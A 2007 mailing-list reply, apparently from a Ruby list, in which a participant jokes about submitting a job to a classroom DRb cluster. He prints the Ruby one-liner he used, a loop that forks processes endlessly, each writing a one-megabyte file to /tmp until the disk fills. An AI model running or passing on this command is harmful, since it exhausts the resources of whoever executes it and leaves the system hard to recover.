On Wed, 7 Feb 2007, Phrogz wrote:

> On Feb 6, 1:16 pm, gwtm... / mac.com wrote:
>> Ugh.  I get shivers just seeing this sort of thing in 'print'.  It is
>> a common example of what *not* to do but I'll bet someone, somewhere,
>> has said 'Gee, I wonder what this does?'.  After a quick click-drag,
>> copy, paste; someone, somewhere, is having a bad day.
>
> The good news is that it's probable that you won't hear from that
> person for...well, probably at least a couple of days before the
> system is up and working again. :)

that reminds me of a presentation on drb i did once: we set up a mini cluster
with everyones computer feeding from a tuplespace.  then i submitted the job

   ruby -e'  require "tmpdir"; loop{ fork{ open(File.join(Dir.tmpdir, $$.to_s),"w"){|f| f.write(0.chr * (2**20) }  } }  '

it's hard to reboot when /tmp is full!

;-)

-a
--
we can deny everything, except that we have the possibility of being better.
simply reflect on that.